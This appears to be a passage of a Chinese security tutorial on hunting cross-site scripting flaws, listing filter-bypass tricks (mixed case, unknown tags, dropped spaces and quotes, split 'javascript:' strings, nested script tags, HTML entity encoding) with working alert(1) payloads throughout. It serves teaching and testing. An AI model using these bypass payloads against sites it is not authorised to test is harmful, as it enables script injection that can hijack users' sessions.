
XSS Vulnerability Hunting: Cross-Site Scripting Attacks

Date: 2020-02-26 17:21:39

<section powered-by="xiumi.us" style="margin: 30px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; vertical-align: top; border-width: 1px; border-radius: 0px; border-style: none; border-color: rgb(76, 68, 71); background-color: rgb(238, 233, 241);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: -3px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: -10px 0px -10px 20px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: bottom; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 0px; border-style: none; border-color: rgb(76, 68, 71);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 6px 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-image: linear-gradient(90deg, rgb(231, 59, 112) 0%, rgba(231, 59, 112, 0.2) 100%);"><section 
powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 1; letter-spacing: 0px; font-size: 32px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">04</strong></p></section></section></section></section><section style="margin: 0px; padding: 10px 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: bottom; width: auto; flex: 1 1 auto; border-width: 0px;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 2; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">XSS漏洞挖掘技巧</strong></p></section></section></section></section></section></section><p></p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section 
style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; 
font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">常见的绕过姿势</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">实际应用中web程序往往会通过一些过滤规则来阻止带有恶意代码的用户输入被显示,但由于HTML语言的松散性和各种标签的不同优先级,使得我们绕过过滤规则成为了可能。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; 
line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1.1 利用大小写绕过</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">HTML标签名和属性名是不区分大小写,我们可以全使用大写,或者混合使用,如下的几段代码都是可以被正确解析的:</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><imG SRC="1" ONERROR="alert(1)"></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><ScRipt>alert(1)</SCRIpt></p></section></section></section><section 
powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1.2 使用未知标签</strong></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 
1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><xxxx onclick="alert(1)">aaaa</xxxx></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1.3 不使用空格和引号</strong></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: 
rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><img src=1 onerror=alert(1)></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><img/src=&#39;1&#39;/onerror=alert(1)></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><body/onload=alert(1)></body></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1.4 
不闭合标签</strong></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><body/onload=alert(1)></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; 
max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1.5 使用回车、Tab等符号截断javascript</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">而浏览器中解析器中词法分析器会跳过空白跟换行之类的无效字符</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="jav<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>ascRIPt:alert(1)">使用回车截断javascript</a><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: 
border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><a href="javas&nbsp; cript:alert(1)">使用tab截断javascript</a></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1.6 利用过滤器规则</strong></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section 
powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><Sc<script>Ript>alert(1)</sCRIp</script>t></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 
0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.2</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: 
border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">HTML编码</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; text-align: left; overflow-wrap: break-word !important;">HTML标签中的某些属性值可以使用&#ASCII方式进行编码:</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; 
letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; text-align: left; overflow-wrap: break-word !important;">如把尖括号编码[ < ] -----> html十进制: < html十六进制:<</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; text-align: left; overflow-wrap: break-word !important;"><imgsrc=1 onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;"></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; text-align: left; overflow-wrap: break-word !important;"><img src=1 onerror=&#97&#108&#101&#114&#116&#40&#49&#41></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; text-align: left; overflow-wrap: break-word !important;"><img src=1 onerror="&#000097;&#0000108;&#0000101;&#0000114;&#0000116;&#000040;&#000049;&#000041;"></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; text-align: left; overflow-wrap: break-word !important;"><a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;">aaaa</a></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; 
min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; 
